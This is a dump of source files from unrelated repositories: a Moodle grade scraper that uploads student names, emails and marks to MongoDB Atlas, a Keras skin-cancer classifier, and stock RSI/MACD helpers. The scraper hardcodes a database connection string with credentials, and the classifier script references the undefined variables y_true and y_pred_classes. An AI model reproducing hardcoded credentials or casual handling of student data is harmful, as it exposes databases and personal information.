"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom requests import session\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nclass ParserNotas:\n\n username = ''\n password = ''\n baseweb = ''\n direccion = './CSV/out.csv'\n\n def iniciar_Sesion( self, user, passw, base):\n self.username = user\n self.password = passw\n self.baseweb = base\n\n def get_base( self ):\n return self.baseweb\n\n def parsear( self,online ):\n baseurl = self.baseweb\n #'http://campus.fi.uba.ar/'\n authdata = {\n 'action': 'login',\n 'username': self.username,\n 'password': self.password\n }\n\n with session() as ses:\n r = ses.post(baseurl + 'login/index.php', data=authdata)\n r = ses.get(online)\n #'http://campus.fi.uba.ar/grade/report/grader/index.php?id=382'\n return (r)\n\n def get_usuario( self ):\n return self.username\n\n def get_table (self, r):\n soup = BeautifulSoup(r.text,'html.parser')\n table= soup.find('table',{'class':'gradereport-grader-table'})\n table_body = table.find('tbody')\n rows = table.find_all('tr')\n data = []\n for row in rows:\n cols = row.find_all(['th','td'])\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele])\n alumnos = pd.DataFrame(data=data)\n return ( pd.DataFrame(data=data) )\n\n def get_Notas(self, table):\n alumnos = table[table.columns[0:10]]\n alumnos.dropna()\n alumnosfiltro = alumnos.iloc[4:62, 0:10]\n alumnosfiltro.columns=['Nombre','Email','Parcial1','Parcial2','Parcial3','RecParcial1','RecParcial2','RecParcial3','2RecParcial1','2RecParcial2']\n alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial1 != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial1B != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Parcial2 != '-']\n #alumnosfiltro = alumnosfiltro[alumnosfiltro.Rec1 != '-']\n self.get_csv(alumnosfiltro)\n return (alumnosfiltro)\n\n def get_csv(self, dataF):\n dataF.to_csv(self.direccion, index=False, header=True, sep=',', decimal=',', encoding = 'utf-8')\n\n def get_nombre_csv(self):\n return self.direccion\n\n def set_dir_csv(self, nueva):\n self.direccion=nueva\n"
},
{
"alpha_fraction": 0.550599217414856,
"alphanum_fraction": 0.5519307851791382,
"avg_line_length": 31.521739959716797,
"blob_id": "f558192e92b60e3a272768fa8969e6ea218158ff",
"content_id": "3f005c4193aa803348c4d66c4d0fe9045f3a0999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1502,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 46,
"path": "/build/lib/Parser/atlas.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#write the .csv file in mongoAtlas database\n# -*- coding: utf-8 -*-\nimport csv\nimport pandas as pd\nfrom pymongo import MongoClient\n\n#Importar y exportar datos desde el punto de vista del servidor\n\nclass Atlas:\n def __init__(self, server):\n self.client = MongoClient(server)\n\n def importar(self, archivo):\n db = self.client.coreTec\n db.coreTest.delete_many({})\n with open (archivo) as File:\n reader = csv.DictReader(File)\n header = [\"Email\", \"ParcialA\", \"ParcialB\"]\n for each in reader:\n row={}\n for field in header:\n row[field] = each[field]\n print(row)\n db.coreTest.insert_one(row)\n\n def exportar(self):\n db = self.client.coreTec\n elements = db.coreTest.find().count()\n fivestarcount = db.coreTest.find()\n each = (list(fivestarcount))\n Email = list()\n ParcialA = list()\n ParcialB = list()\n header = [\"Email\", \"ParcialA\", \"ParcialB\"]\n\n for k in range(1, elements):\n row = {}\n for field in header:\n row[field] = each[k][field]\n Email.append(row[\"Email\"])\n ParcialA.append(row[\"ParcialA\"])\n ParcialB.append(row[\"ParcialB\"])\n df = pd.DataFrame(data={\"Email\":Email,\"ParcialA\":ParcialA,\"ParcialB\":ParcialB})\n df.to_csv(\"./CSV/in.csv\", sep=',', index=False)\n self.client.close\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6747868657112122,
"alphanum_fraction": 0.6820949912071228,
"avg_line_length": 25.483871459960938,
"blob_id": "6afcbdfc14c7f8f1411af8e2074b3bb55236b6d6",
"content_id": "2f4411ec759a3a0d101b2169859406d7955c8d76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 31,
"path": "/bin/ejecutar.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport getpass\nfrom Parser.parserNotas import ParserNotas\nfrom Parser.atlas import Atlas\n\nparser = ParserNotas()\natlas = Atlas('mongodb+srv://diegolanus:[email protected]/test?retryWrites=true')\n\nusuario = input(\"Usuario:\")\npassword = getpass.getpass(\"Password:\")\n\nparser.iniciar_Sesion( usuario, password, 'http://campus.fi.uba.ar/')\nelementoParser = parser.parsear('http://campus.fi.uba.ar/grade/report/grader/index.php?id=382')\ntabla = parser.get_table(elementoParser)\n\nprint (parser.get_Notas(tabla))\natlas.importar(parser.get_nombre_csv())\natlas.exportar()\n\n\n\n# En Caso de usar parametros #\n#if len(sys.argv) == 2:\n #comando = sys.argv[1]\n #print (\"Comando:\", comando)\n\n #if comando == \"-a\":\n #print (parser.get_NotasA(tabla))\n #if comando == \"-b\":\n"
},
{
"alpha_fraction": 0.7120921015739441,
"alphanum_fraction": 0.7140114903450012,
"avg_line_length": 21.69565200805664,
"blob_id": "92a9e2914fd0c0148a57c8af4a4bacfc3f939547",
"content_id": "52107eea60b8c96bceec582e309a6ab76da6f778",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 521,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 23,
"path": "/build/lib/Parser/atlasread.py",
"repo_name": "diegolanu89/ParserNotas",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport csv\nfrom pymongo import MongoClient\n\nclient=MongoClient('mongodb+srv://diegolanus:[email protected]/test?retryWrites=true')\n\ndb = client.coreTec\nelements = db.coreTest.find().count()\nfivestarcount = db.coreTest.find()\neach = (list(fivestarcount))\nData=list()\nheader= [\"ParcialA\"]\n\nfor k in range(1,elements):\n row={}\n for field in header:\n row[field]=each[k][field]\n Data.append(row[\"ParcialA\"])\ndf = pd.DataFrame(data={\"ParcialA\":Data})\ndf.to_csv(\"./notas.csv\", sep=',',index=False)\n\n\nclient.close"
}
] | 7 |
aniliitb10/BoostAsio
|
https://github.com/aniliitb10/BoostAsio
|
8af5d39af73afd3c3602a200bc253bc7875cc278
|
06dbabe5864f90e53da860f28c1dbe021717093e
|
f5f76abb9a50645ffb06add4094d1d2170e79f78
|
refs/heads/master
| 2023-06-14T04:35:35.008653 | 2021-07-02T11:08:23 | 2021-07-02T11:08:23 | 382,321,175 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7835051417350769,
"alphanum_fraction": 0.8092783689498901,
"avg_line_length": 26.714284896850586,
"blob_id": "81699411f86a112ba76e8515ffa63c0e7232db35",
"content_id": "7a5d8c17f6945ec314d0750898556ca8c138cd56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 7,
"path": "/CMakeLists.txt",
"repo_name": "aniliitb10/BoostAsio",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.19)\nproject(BoostAsio)\n\nset(CMAKE_CXX_STANDARD 17)\n\nadd_executable(async_echo_server async_tcp_echo_server.cpp)\ntarget_link_libraries(async_echo_server pthread)\n"
},
{
"alpha_fraction": 0.5803782343864441,
"alphanum_fraction": 0.5898345112800598,
"avg_line_length": 29.781818389892578,
"blob_id": "28e0cebdd9cd15ff17f5bd9c1661fedf3952840c",
"content_id": "7da46adae39eb8d407544b6f87b9cc09dcfef935",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1692,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 55,
"path": "/python/tcp_one_connection.py",
"repo_name": "aniliitb10/BoostAsio",
"src_encoding": "UTF-8",
"text": "\"\"\"Tests TCP communication between a server and a client.\"\"\"\n\nfrom testplan.testing.multitest import MultiTest, testsuite, testcase\nfrom testplan.testing.multitest.driver.tcp import TCPServer, TCPClient\nfrom testplan.testing.multitest.driver.app import App\nimport re\n\n\n@testsuite\nclass TCPTestsuite(object):\n \"\"\"TCP tests for a server and a client.\"\"\"\n\n def setup(self, env):\n \"\"\"Will be executed before the testcase.\"\"\"\n # env.client.connect()\n\n @testcase\n def send_and_receive_msg(self, env, result):\n \"\"\"\n Client sends a message, server received and responds back.\n \"\"\"\n msg = env.client.cfg.name\n result.log(\"Client is sending: {}\".format(msg))\n bytes_sent = env.client.send_text(msg)\n\n received = env.client.receive_text(size=bytes_sent)\n result.equal(received, msg, \"Client received\")\n\n\ndef get_multitest(name):\n \"\"\"\n Creates and returns a new MultiTest instance to be added to the plan.\n The environment is a server and a client connecting using the context\n functionality that retrieves host/port of the server after is started.\n \"\"\"\n test = MultiTest(\n name=name,\n suites=[TCPTestsuite()],\n environment=[\n App(\n \"echo\",\n binary=\"/home/anil/CLionProjects/BoostAsio/cmake-build-debug/async_echo_server\",\n args=[\"12345\"],\n stdout_regexps=[\n re.compile(r\".*Echo server is up.*\")\n ],\n ),\n TCPClient(\n name=\"client\",\n host=\"127.0.0.1\",\n port=12345,\n ),\n ],\n )\n return test"
}
] | 2 |
honglongcai/MOTDT
|
https://github.com/honglongcai/MOTDT
|
c87835fd4368da985df271e6accff1891d0df8fa
|
20554aefa6f16d69813715f880f0b80b49e03984
|
033f9f0bce66550d3ba16391e6ee8285975b564a
|
refs/heads/master
| 2020-08-03T11:59:31.982348 | 2019-10-06T18:46:30 | 2019-10-06T18:46:30 | 211,745,429 | 0 | 0 |
MIT
| 2019-09-30T00:35:29 | 2019-09-25T06:17:12 | 2019-05-01T18:02:02 | null |
[
{
"alpha_fraction": 0.6189024448394775,
"alphanum_fraction": 0.6189024448394775,
"avg_line_length": 28.636363983154297,
"blob_id": "450bab44978987697212277f372f0c2cc1fea177",
"content_id": "ac9be441e593211a5abe186e8d8b1dfa25a57e61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 656,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 22,
"path": "/models/reid/data.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "import os\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\n\nclass Data(Dataset):\n \"\"\"Dataset class, used when inputting images from a directory\"\"\"\n def __init__(self, data_dir, transform=None):\n photos = os.listdir(data_dir)\n self.data_dir = data_dir\n self.images = [photo for photo in photos]\n self.transform = transform\n \n def __getitem__(self, index):\n photo = os.path.join(self.data_dir, self.images[index])\n img = Image.open(photo)\n img = self.transform(img)\n return img, self.images[index]\n \n def __len__(self):\n return len(self.images)\n "
},
{
"alpha_fraction": 0.6170854568481445,
"alphanum_fraction": 0.643216073513031,
"avg_line_length": 28.264705657958984,
"blob_id": "6679e3c18847209cea3ded5a58888d2460224ad8",
"content_id": "72e3b8016ee5a812f6dd6fc3d59aff981f60b101",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1990,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 68,
"path": "/models/reid/__init__.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom distutils.version import LooseVersion\nimport torch\nfrom torch.autograd import Variable\nfrom torch.nn.parallel import DataParallel\n\nfrom utils import bbox as bbox_utils\nfrom utils.log import logger\nfrom models import net_utils\nfrom .Model import Model\nfrom PIL import Image\n\n\ndef load_reid_model():\n model = DataParallel(Model())\n ckpt = '/home/honglongcai/Github/PretrainedModel/model_410.pt'\n model.load_state_dict(torch.load(ckpt, map_location='cuda'))\n logger.info('Load ReID model from {}'.format(ckpt))\n\n model = model.cuda()\n model.eval()\n return model\n\n\ndef img_process(img):\n img = np.asarray(img)\n img = Image.fromarray(img)\n img = img.resize((128, 384), resample=3)\n img = np.asarray(img)\n img = img[:, :, :3]\n img = img.astype(np.float32)\n img = img / 255\n im_mean = np.array([0.485, 0.456, 0.406])\n im_std = np.array([0.229, 0.224, 0.225])\n img = img - im_mean\n img = img / im_std\n img = np.transpose(img, (2, 0, 1))\n return img\n\n\ndef extract_image_patches(image, bboxes):\n bboxes = np.round(bboxes).astype(np.int)\n bboxes = bbox_utils.clip_boxes(bboxes, image.shape)\n patches = [img_process(image[box[1]:box[3], box[0]:box[2]]) for box in bboxes]\n return np.array(patches)\n\n\ndef extract_reid_features(reid_model, image, tlbrs):\n if len(tlbrs) == 0:\n return torch.FloatTensor()\n\n patches = extract_image_patches(image, tlbrs)\n\n gpu = net_utils.get_device(reid_model)\n if LooseVersion(torch.__version__) > LooseVersion('0.3.1'):\n with torch.no_grad():\n im_var = Variable(torch.from_numpy(patches))\n if gpu is not None:\n im_var = im_var.cuda(gpu).float()\n features = reid_model(im_var).data\n else:\n im_var = Variable(torch.from_numpy(patches), volatile=True)\n if gpu is not None:\n im_var = im_var.cuda(gpu)\n features = reid_model(im_var).data\n\n return features\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5640616416931152,
"avg_line_length": 39.014183044433594,
"blob_id": "a7034aa77c2404da5a3c455ab0f8cf4a50dbd63c",
"content_id": "296c20a5c810e77bade90b119e0b5d655023840e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5643,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 141,
"path": "/models/reid/getfeature.py",
"repo_name": "honglongcai/MOTDT",
"src_encoding": "UTF-8",
"text": "\"\"\"@Desc: ReID script version 2.1.0 for attention mgn model\n@Result: Suning55ID: mAP: 90.1%\n@Result: Suning763ID: mAP: 53.4%\n@Time Consumption: 250fps under one GPU\n@Date: created this script by Honglong Cai on 04/03/2019\n@Data: updated by Honglong Cai on 04/22/2019\n@Requirements:\n python >= 3.6\n pytorch >= 0.4.1\n torchvision >= 0.1.9\n PIL >= 5.3.0\n@Image input: images can be inputted either as an single image \\\n or from a directory\n@CPU/GPU support: support both cpu and gpu\n@Call format: python getfeature.py model_weight photo_path --sys_device_ids\n ----- photo_path can be either a single image or an image directory\n ----- use --sys_device_ids '' when running at cpu environment\n ----- use --sys_device_ids 0 when running at gpu:0\n ----- use --sys_device_ids 0,1 or any when running at multiple gpu\n@run at 'cpu': python getfeature.py /Users/honglongcai/model.pt \\\n /Users/honglongcai/photo.jpg --sys_device_ids ''\n --sys_device_ids ''\n@Test use 'gpu:0': python getfeature.py /Users/honglongcai/model.pt \\\n /Users/honglongcai/photo.jpg --sys_device_ids 0\n@testing code below shows the detail examples\n\"\"\"\n\n\nimport argparse\nimport os\n\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DataParallel\nfrom torch.utils.data import DataLoader\n\nfrom Model import Model\nfrom data import Data\n\n\nclass GetFeature(object):\n \"\"\"Extract features\n Arguments\n model_weight_file: pre-trained model\n sys_device_ids: cpu/gpu\n \"\"\"\n def __init__(self, model_weight_file, sys_device_ids=''):\n if len(sys_device_ids) > 0:\n os.environ['CUDA_VISIBLE_DEVICES'] = sys_device_ids\n self.sys_device_ids = sys_device_ids\n self.model = DataParallel(Model())\n if torch.cuda.is_available() and self.sys_device_ids != '':\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n self.model.load_state_dict(torch.load(model_weight_file,\n map_location=device))\n self.model.to(device)\n self.model.eval()\n \n def __call__(self, photo_path=None, batch_size=1):\n \"\"\"\n get global feature and local feature\n :param photo_path : either photo directory or a single image\n :param batch_size : useful only when photo_path is a directory\n :return: feature: numpy array, dim = num_images * 2048,\n photo_name: a list, len = num_images\n \"\"\"\n '''\n if photo_dir is None and photo is None:\n raise self.InputError('Error: both photo_path '\n 'and images is None.')\n if photo_dir and photo:\n raise self.InputError('Error: only need one argument, '\n 'either photo_path or images.')\n '''\n # input is a directory\n if os.path.isdir(photo_path):\n dataset = Data(photo_path, self._img_process)\n data_loader = DataLoader(dataset, batch_size=batch_size,\n num_workers=8)\n features = torch.FloatTensor()\n photos = []\n for batch, (images, names) in enumerate(data_loader):\n images = images.float()\n if torch.cuda.is_available() and self.sys_device_ids != '':\n images = images.to('cuda')\n feature = self.model(images).data.cpu()\n features = torch.cat((features, feature), 0)\n photos = photos + list(names)\n if batch % 10 == 0:\n print('processing batch: {}'.format(batch))\n features = features.numpy()\n features = features/np.linalg.norm(features, axis=1,\n keepdims=True)\n return features, photos\n # input is a single image\n else:\n photo_name = photo_path.split('/')[-1]\n img = Image.open(photo_path)\n image = self._img_process(img)\n image = np.expand_dims(image, axis=0)\n image = torch.from_numpy(image).float()\n feature = self.model(image).data.numpy()\n feature = feature/np.linalg.norm(feature, axis=1,\n keepdims=True)\n return feature, [photo_name]\n \n def _img_process(self, img):\n img = img.resize((128, 384), resample=3)\n img = np.asarray(img)\n img = img[:, :, :3]\n img = img.astype(float)\n img = img / 255\n im_mean = np.array([0.485, 0.456, 0.406])\n im_std = np.array([0.229, 0.224, 0.225])\n img = img - im_mean\n img = img / im_std\n img = np.transpose(img, (2, 0, 1))\n return img\n \n\nif __name__ == '__main__':\n \"\"\"testing code\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('model_weight_file', type=str,\n help='weight file')\n parser.add_argument('photo_path', type=str,\n help='either a image directory or an image')\n parser.add_argument('--sys_device_ids', type=str, default='',\n help='cuda ids')\n parser.add_argument('--batch_size', type=int, default=1,\n help='batch size')\n args = parser.parse_known_args()[0]\n \n get_feature = GetFeature(args.model_weight_file, args.sys_device_ids)\n features, p = get_feature(photo_path=args.photo_path, batch_size=args.batch_size)\n #print(features)\n #print(features.shape)\n #print(features.dtype)\n\n"
}
] | 3 |
EsraSendel/Skin_Cancer
|
https://github.com/EsraSendel/Skin_Cancer
|
143ace844fb9d414514e10c3fc714d5b452a1e26
|
d86af05c58ae43097f4cf214f3e377b2cd1c5d68
|
6da871d4bc30089b4f5242815f01f20e520005fa
|
refs/heads/main
| 2023-07-14T14:29:59.883987 | 2021-08-12T13:40:33 | 2021-08-12T13:40:33 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6591421961784363,
"alphanum_fraction": 0.6862302422523499,
"avg_line_length": 29.481651306152344,
"blob_id": "0896138068030f9ccaabfdda6b276cbe357ffb31",
"content_id": "1e2bc34ab6bf275aac32912d940548f45c668a16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6645,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 218,
"path": "/skincaner.py",
"repo_name": "EsraSendel/Skin_Cancer",
"src_encoding": "UTF-8",
"text": "###### I've used Google Colab to do the training (Some lines may differ when training locally) ######\n\n\"\"\"\nSkin cancer lesion classification using the HAM10000 dataset\n\nDataset link:\nhttps://www.kaggle.com/kmader/skin-cancer-mnist-ham10000\n\n\"\"\"\n\n### Google Colab ###\n#To Download Data\n! kaggle datasets download -d kmader/skin-cancer-mnist-ham10000\n\n#Unzip files\n!unzip skin-cancer-mnist-ham10000.zip\n### Google Colab ###\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nfrom glob import glob\nfrom PIL import Image\nfrom sklearn.metrics import confusion_matrix\n\nimport keras\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D, BatchNormalization\nfrom sklearn.model_selection import train_test_split\nfrom scipy import stats\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils import resample\n\nSIZE=32\nnp.random.seed(42)\n\n\n#Read CSV file\nskin_df = pd.read_csv('/path/HAM10000_metadata.csv')\n\n#Read images based on ID from CSV\nimage_path = {os.path.splitext(os.path.basename(x))[0]: x\n for x in glob(os.path.join('/path/', '*', '*.jpg'))}\n\n#Add the image path(s) to datafram(skin_df) as a new column \nskin_df['path'] = skin_df['image_id'].map(image_path.get)\n\n#Use the path(s) to read image(s) --> resize images into 32X32 --> convert images into np.array --> add them into a new column\nskin_df['image'] = skin_df['path'].map(lambda x: np.asarray(Image.open(x).resize((32,32))))\n\n##### Plotting #####\nn_samples = 5\n# Plotting\nfig, m_axs = plt.subplots(7, n_samples, figsize = (4*n_samples, 3*7))\nfor n_axs, (type_name, type_rows) in zip(m_axs, \n skin_df.sort_values(['dx']).groupby('dx')):\n n_axs[0].set_title(type_name)\n for c_ax, (_, c_row) in zip(n_axs, type_rows.sample(n_samples, random_state=1234).iterrows()):\n c_ax.imshow(c_row['image'])\n c_ax.axis('off')\n##### Plotting #####\n \n \n#Label encoding --> From text to numeric values\nle = LabelEncoder()\nle.fit(skin_df['dx'])\nLabelEncoder()\n#Transform and Add those labels to dataframe(skin_df) as a new column\nskin_df['label']=le.transform(skin_df['dx'])\n\n\n#######Plotting#########\n#Data distribution visualization\n#We're just looking at Cell Type(cancer type) since that's what we're gonna deal with\nfig = plt.figure(figsize=(12,8))\n\nax1 = fig.add_subplot(221)\nskin_df['dx'].value_counts().plot(kind='bar', ax=ax1)\nax1.set_ylabel('Count')\nax1.set_title('Cell Type');\n\nplt.tight_layout()\nplt.show()\n#######Plotting#########\n\n\n#Balancing data.\n\n#Get labels and counts --> Assign them into a new DataFrames\ndf_0 = skin_df[skin_df['label'] == 0]\ndf_1 = skin_df[skin_df['label'] == 1]\ndf_2 = skin_df[skin_df['label'] == 2]\ndf_3 = skin_df[skin_df['label'] == 3]\ndf_4 = skin_df[skin_df['label'] == 4]\ndf_5 = skin_df[skin_df['label'] == 5]\ndf_6 = skin_df[skin_df['label'] == 6]\n\n#Resamplling those DataFrames\nn_samples = 1000\ndf_0_balanced = resample(df_0, replace=True, n_samples=n_samples, random_state=42)\ndf_1_balanced = resample(df_1, replace=True, n_samples=n_samples, random_state=42)\ndf_2_balanced = resample(df_2, replace=True, n_samples=n_samples, random_state=42)\ndf_3_balanced = resample(df_3, replace=True, n_samples=n_samples, random_state=42)\ndf_4_balanced = resample(df_4, replace=True, n_samples=n_samples, random_state=42)\ndf_5_balanced = resample(df_5, replace=True, n_samples=n_samples, random_state=42)\ndf_6_balanced = resample(df_6, replace=True, n_samples=n_samples, random_state=42)\n\n#Combining those DataFrames to a new Single DataFrame\nskin_df_balanced = pd.concat([df_0_balanced,df_1_balanced,df_2_balanced,df_3_balanced,df_4_balanced,df_5_balanced,df_6_balanced])\n\n#Will check balanced classes\nprint(skin_df_balanced['label'].value_counts())\n\n\n\n\n#Creating the X and Y for Training and Testing\n\n#Converting 'image(s)' from Dataframe(skin_df_balanced) to np.array\nX = np.asarray(skin_df_balanced['image'].tolist())\n#Sclling those values from 0-255 to 0-1.\nX=X/255.\n\n#Assigning 'label(s)' from Dataframe(skin_df_balanced) to Y\nY=skin_df_balanced['label']\n#Since this a multiclass problem we need to conver those Y values into 'categorical'\nY_cat = to_categorical(Y, num_classes=7)\n\n#Will Split Training and Testing\nx_train, x_test, y_train, y_test = train_test_split(X, Y_cat, test_size=0.25, random_state=42)\n\n\n############# Model #################\n\n#Finally, will define the model\nnum_calasses = 7\n\nmodel = Sequential()\nmodel.add(Conv2D(256, (3, 3), activation=\"relu\", input_shape=(SIZE, SIZE, 3)))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, (3, 3), activation=\"relu\"))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(64, (3, 3), activation=\"relu\"))\n#BatchNormalization\nmodel.add(MaxPool2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\n\nmodel.add(Dense(32))\nmodel.add(Dense(7, activation=\"softmax\"))\nmodel.summary()\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"Adam\", metrics=[\"acc\"])\n\n############# Model #################\n\n#Let's Train\n\nbatch_size = 16\nepochs = 85\n\nhistory = model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size, validation_data=(x_test, y_test), verbose=2)\n\n\n#The Final Score\nscore = model.evaluate(x_test, y_test)\nprint('Test Accuracy:', score[1]*100, '%')\n\n\n######### Plotting #########\n#plot the training and validation loss at each epoch\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\nplt.plot(epochs, loss, 'y', label='Training loss')\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.show()\n######### Plotting #########\n\n\n######### Plotting #########\n#plot the training and validation accuracy at each epoch\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nplt.plot(epochs, acc, 'y', label='Training acc')\nplt.plot(epochs, val_acc, 'r', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n######### Plotting #########\n\n\n######### Plotting #########\n#Plot fractional incorrect misclassifications\ncm = confusion_matrix(y_true, y_pred_classes)\nincorr_fraction = 1 - np.diag(cm) / np.sum(cm, axis=1)\nplt.bar(np.arange(7), incorr_fraction)\nplt.xlabel('True Label')\nplt.ylabel('Fraction of incorrect predictions')\n######### Plotting #########\n\n#Saving the model\nmodel.save('skinCancer.h5')\n"
},
{
"alpha_fraction": 0.7431421279907227,
"alphanum_fraction": 0.7705735564231873,
"avg_line_length": 29.846153259277344,
"blob_id": "c483aa753ea53fc052090f07eba517748bc2cbc1",
"content_id": "4f8cf09dc0643ce3fc1cd10952e18dbb1b9acdf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 13,
"path": "/README.md",
"repo_name": "EsraSendel/Skin_Cancer",
"src_encoding": "UTF-8",
"text": "# Skin Cancer\nSkin cancer classification using HAM10000\n\nDataset link - https://www.kaggle.com/kmader/skin-cancer-mnist-ham10000\n\nThere are 7 classes of skin cancer lesions included in this dataset:<br><br>\nMelanocytic nevi (nv)<br>\nMelanoma (mel)<br>\nBenign keratosis-like lesions (bkl)<br>\nBasal cell carcinoma (bcc) <br>\nActinic keratoses (akiec)<br>\nVascular lesions (vas)<br>\nDermatofibroma (df)\n"
}
] | 2 |
shikaru/hack_stock_market
|
https://github.com/shikaru/hack_stock_market
|
0e72635854d944eff8616b3e7e5d0b40730b1cc8
|
d31f92be4f95130454678fe2fc37b56cf1b2dd43
|
4a65af465e594fab9712418f1535d7610aeb8fcc
|
refs/heads/main
| 2023-04-07T23:11:49.309989 | 2021-04-21T06:05:15 | 2021-04-21T06:05:15 | 335,208,170 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6991341710090637,
"avg_line_length": 45.25,
"blob_id": "40a0bf086ec135ff67340c0b0b82d0cd886742c2",
"content_id": "f1c28c9fe42b8641cdfc3a547aff02f71fa0bc9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 924,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 20,
"path": "/get_stock_data/indexes.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "def get_indexes(start=datetime.datetime(2020, 1, 1),end=datetime.datetime(2020, 12, 31),brand='1305.JP',n=14,):\n date=start-datetime.timedelta(days=40)\n stooq = StooqDailyReader(brand, start=date, end=end)\n data = stooq.read()\n #input data must be pandas dataframe\n diff=data[\"Close\"].diff().sort_index(ascending=True)\n up=diff.copy()\n up[up<0]=0\n down=diff.copy()\n down[down>0]=0\n up_sma_14 = up.rolling(window=n, center=False).mean()\n down_sma_14 = down.abs().rolling(window=n, center=False).mean()\n RSI=(up_sma_14)/(down_sma_14+up_sma_14)\n\n #MacD\n short=data[\"Close\"].sort_index(ascending=True).ewm(span=12,adjust=False).mean()\n long=data[\"Close\"].sort_index(ascending=True).ewm(span=26,adjust=False).mean()\n macd=short-long\n signal = macd.ewm(span=9).mean()\n return RSI[30:]*100, macd.sort_index(ascending=True)[30:],signal.sort_index(ascending=True)[30:],data[\"Close\"][:-30].sort_index(ascending=True)"
},
{
"alpha_fraction": 0.6351575255393982,
"alphanum_fraction": 0.6965174078941345,
"avg_line_length": 32.55555725097656,
"blob_id": "e7e82c9bb3c74e6f85d5126ef50c47035f9d4a01",
"content_id": "875d13fe8d69cef505ccb1965e5e289b9bebec96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/get_stock_data/get_rsi.py",
"repo_name": "shikaru/hack_stock_market",
"src_encoding": "UTF-8",
"text": "from pandas_datareader.stooq import StooqDailyReader\nfrom datetime import datetime\nimport pandas as pd\n\ndef get_rsi(start=datetime(2020, 1, 1),end=datetime(2020, 12, 31),brand='1305.JP',n=14,):\n stooq = StooqDailyReader(brand, start=start, end=end)\n data = stooq.read()\n #input data must be pandas dataframe\n diff=data[\"Close\"].diff()\n up=diff.copy()\n up[up<0]=0\n down=diff.copy()\n down[down>0]=0\n up_sma_14 = up.rolling(window=n, center=False).mean()\n \n down_sma_14 = down.abs().rolling(window=n, center=False).mean()\n RSI=(up_sma_14)/(down_sma_14+up_sma_14)\n return RSI*100, data[\"Close\"]"
},
{
